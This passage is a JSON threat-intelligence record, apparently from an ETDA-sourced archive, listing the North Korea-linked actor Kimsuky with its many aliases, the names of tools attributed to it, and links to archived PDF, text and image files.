			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434646,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.pdf",
		"text": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.txt",
		"img": "https://archive.orkl.eu/d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c.jpg"
	}
}